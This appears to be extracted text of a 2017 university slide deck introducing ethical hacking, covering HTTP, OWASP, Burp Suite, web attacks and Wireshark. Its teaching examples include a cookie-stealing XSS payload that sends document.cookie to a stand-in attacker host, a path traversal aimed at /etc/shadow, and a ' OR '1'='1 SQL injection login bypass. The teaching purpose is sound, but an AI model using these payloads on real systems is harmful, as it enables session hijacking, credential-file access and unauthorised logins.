Introduction to Ethical Hacking - csap Web and... · Introduction to Ethical Hacking Summer University 2017 ... • Nginx • Etc… SU17 ... 3xx Redirection 301 Moved Permanently

Introduction to Ethical Hacking

Summer University 2017 Seoul, Republic of Korea

Alexandre Karlov

Today

• Some tools for web attacks

• Wireshark

• How a writeup looks like

0x04 Tools for Web attacks

SU17, Ethical Hacking class, Seoul, 2017

Overview• Reminders

• HTTP, requests / responses, GET / POST • SQL • OWASP

• A few useful tools

• Attacks • URL manipulation • Client-side protections • «Session Hijacking» • «Cross-site scripting» (XSS) • «Cross-site request forgeries» (CSRF) • SQL injections


HTTP: a few reminders• HTTP: HyperText Transfer Protocol

• Designed to exchange ressources

• Communication protocol

• Client-Server architecture (requests - responses)

• Application layer, on the top of a reliable stack (TCP/IP)

• It is stateless

IP addressHTTP (TCP port 80)

software

files and ressourcesserver


Client-server architecture

HTTP listener (port TCP 80)Wait for a connection.

IP addressWeb browser (Client)

Open connectionI want […] (GET)

[content]Connexion closed

Click…

Clients:• Browsers• Application (mobile / desktop)• Robots, spiders• Scanner, fuzzers

Servers:• Apache• Microsoft Internet Information Services (IIS)• Tomcat• Nginx• Etc…


HTTP request

Client Server

Request<METHOD> <RESSOURCE> <PROT_VERSION>

<HEADERS>

<empty line>

<CONTENT (optionnal>

Most of the times GET or POST


HTTP header fields– General : Cache-Control: no-cache Date: Tue, 15 Nov 2005 08:12:31 GMT

– Request : Accept: text/plain;q=0.5, text/html Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 From: [email protected] Referer: http://www.iict.ch/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

– Response : Location: http://www.heig-vd.ch Server: Microsoft-IIS/6.0

– Entity : Content-Encoding: gzip Content-Length: 3495 (en octets) Content-Type: text/html; charset=ISO-8859-4 Last-Modified: Tue, 15 Nov 2005 12:45:26 GMT

mailto:[email protected]

http://www.iict.ch/index.html

http://www.heig-vd.ch


HTTP response

Client Server

Request

Response<PROT_VERSION> <STATUS-CODE> <STATUS-PHRASE>

<HEADERS>

<DATA>

Code Classe Example

1xx Informational 100 Continue

2xx Success 200 OK

3xx Redirection 301 Moved Permanently302 Found, temp. other URI304 Not Modified

4xx Client error 400 Bad Request401 Unauthorized403 Forbidden404 Not Found

5xx Server error 500 Internal Server Error503 Service Unavailable

A file : HTML, JPG, CSS, … Dynamic page : PHP, JSP, … Meta-data


HTTP with many resources

Client Server

Request image 1

Transfer image 1

Request image 2

Transfer image 2

Request main HTML

Transfer HTML

Finish and display page


HTTP stateless ?• HTTP is stateless

• A response depends only on the request (independent from others request/responses)

• Personalized URLs • www.isi.com/member.php?id=22393269459487635

• Cookie usage • Use special header fields • Set-Cookie header (in a response) : setup a cookie value. • Cookie header (in a request) : cookie.


Databases / SQL• Most of the time, the Web application uses a database to

store data

Adresse IPSQL (TCP port 3306) server

Adresse IPHTTP (TCP port 80)

files and ressources(dynamic pages)

server

server


Simple Query Language (SQL)• Example of the table « users »

• Simple commands allow the Web application to interact with the database : • INSERT INTO users (id, username, password) VALUES (‘4’, ‘Elvis’, ‘1234’); • UPDATE users SET password = ‘4567’ WHERE username = ‘Elvis’; • DELETE FROM users WHERE username = ‘Elvis’; • SELECT id, username FROM users WHERE username = ‘Elvis’ and

password=‘1234’

id name password

1 Artur Art_pwd

2 Charlie kjasd7812

3 Bob 912kkas9

4 Elvis 1234


OWASP overview• The Open Web Application Security Project (OWASP)

• International organization, Open Source

• Free participation and open to anyone

• Mission : promote application security • Web, software, mobile, …

• Ressources : • Documentation (wiki, books, ...), guides, mailing lists, codes, tools, local

chapters & conferences, …

• ~30’000 peoples, 190 chapters, 140 projects, supporters

• www.owasp.org

http://www.owasp.org


OWASP : Projects / knowledge• Top 10

• WebGoat

• WebScarab

• Zed Attack Proxy (ZAP)

• ESAPI

• ASVS

• Development guide

• Code review guide

• Testing guide

• and many many others.source : https://www.owasp.org/images/f/f9/OWASP_Overview_Winter_2009v1.pptx

• 9,421 articles

• 427 presentations • 200 updates per day • +300 mailing lists

• 180 blogs

• 19 hacking attempts

• 2,962 files uploaded

Knowledge base :


OWASP : Top Ten (2013)

[source] http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx


Useful tools• Web browsers

• Some attacks require just a browser.

• Some attacks require additional tools • Browser plugins (Tamper data, Firebug, etc.) • External tools, analysis/interception of communications

• Example : Advanced interception proxys

• The «simples» proxies became powerful suites with many functionalities • Example : Burp suite

• Automated tools • Web scanner/fuzzer/spider


Interception Proxy

• Other functionalities : • Interception proxy • Spider • Fuzzer • Vuln scanner • Manual requests • Cookies/session/tokens analyzer

Client

Server

ToolsRequêtes...

Réponses... Tools

should be configured to connect to the local proxy

Relay messagesAlter messages

Exemples : Burp, ZAP Proxy, Nikto, TamperData, …


Burp Suite• The most well-known toolbox for web hacking

• Comprises: • Proxy - intercept and modify requests • Spider - discover content • Scanner - vulnerabilities scanner • Intruder/repeater - attack tools • …

• Free version available in Kali


Web attacks• URL manipulation

• Client-side protections

• «Session Hijacking»

• «Cross-site scripting» (XSS)

• «Cross-site request forgeries» (CSRF)

• SQL injections

• (and many others)


URL manipulation / forgery• Ressource discovery

• In an URL : • "../.." • "../../../../../etc/shadow" (password file)

• In a general way : • URL forgery for directory • URL forgery to access special files (e.g.: *.php~) • Parameters tampering in the URL or in the cookie :

• identifier, role, ressource, etc.


Client side protections• Client side protections can be bypassed!

• Cookie values • «Referer» • Javascript or any result of a script which gets executed on client-side • Fields (even if choice selection, hidden, or protected by Javascript) • and many others

• The Web application should do (or re-do) the controls server-side.


Session hijacking• A session can be stolen : Log into a system without authentication

• HTTP : cookie stolen, URL stolen, URL forgery, etc.

Client Server

GET pub.php&id=2093847029

pub.php&id=2093847029

Get the session by stealing the id

parameter

GET pub.html cookie

pub.html

GET index.html

index.html Set-cookie

Il suffit de voler le cookie pour accéder à la session !

Client Server

Get the session by stealing the cookie


XSS - Cross site scripting• Reflected XSS (non-persistent)

• The attacker injects data, and it is used as-is in the response or in a script. • Exemple : search engine on websites.

• Stored XSS • The data injected by an attacker are stored on the server. • At each new access, the client will receive the stored script (XSS). • Exemples : forums, gold books, ....

• DOM-based XSS • « Document Object Model » (DOM) modification • Injection generally happens in the URL.

• BeEF tool - Browser Exploitation Framework


XSS - Example stealing webmail cookie

www.pirate.comwww.coldmail.com

2. Webmail connection 4. Collect the

cookie

5. Session hijacking

3. Alice access the URL: http://www.pirate.com/cookie.php?a=[cookie](The cookie used is the one from coldmail.com)

Email contains:

<img src="http://www.urlinexsitante.com/im.jpg" onerror="window.location='http://www.pirate.com/cookie.php?a='+document.cookie;">

1. Send an email

http://www.pirate.com

http://www.coldmail.com

http://www.urlinexsitante.com/im.jpg

http://www.pirate.com/cookie.php?a='+document.cookie


DOM-based XSS : example• Source : https://www.owasp.org/index.php/DOM_Based_XSS

• Expected : http://www.some.site/page.html?default=French

• Attack : http://www.some.site/page.html?default=<script>alert(document.cookie)</script>

• The browser creates a DOM object for the page.

https://www.owasp.org/index.php/DOM_Based_XSS

http://www.some.site/page.html?default=French

http://www.some.site/page.html?default=


CSRF - «Cross-Site Request Forgeries»

• CSRF is an attack that forces a user to execute non-desired action(s) on the Web application.

• To force the user, he should execute a special crafted request (delete something, change profile, change email address, etc.)

• The attacker will craft the « good » request.

• Note that the user should be already authenticated (and have interesting privileges) within the application targeted by the attacker


Injections• SQL injections

• A Web application contains a form where the fields are used to build a SQL request. Without protection, it is possible to « play » with the SQL command.

• Example of an HTML authentification form with login et password : If the result of the SQL request return something, SELECT nom, pwd FROM user_db WHERE nom ='$login' AND pwd ='$password' then we continue...else authentication failed.

• If we try to connect with toto et ' OR '1'='1 SELECT nom, pwd FROM user_db WHERE nom='toto' AND pwd='' OR '1'='1' We get an SQL request that always return something (if toto exists).The user will be accepted even if the password is wrong!

• System command injection • Same idea, but in a command that is executed by the system.

0x05 Wireshark

Wireshark• The ultimate packet sniffer

• Understanding/reverse engineering of protocols

• Network debugging

• Traffic analysis

Wireshark

• Capture filters

• Display filters

Wireshark• Reconstructing streams

Last but not least• Netcat

• Hacker’s Swiss Army Knife

• Read and write tcp ports

• Transferring files, remote administration, reverse shells,…

• Tcpdump

• Command-line packet capture and analyser

• When GUI is not available

• Fast

• To capture for further analysis with Wireshark:

Documents

Introduction to Ethical Hacking - csap Web and... · Introduction to Ethical Hacking Summer University 2017 ... • Nginx • Etc… SU17 ... 3xx Redirection 301 Moved Permanently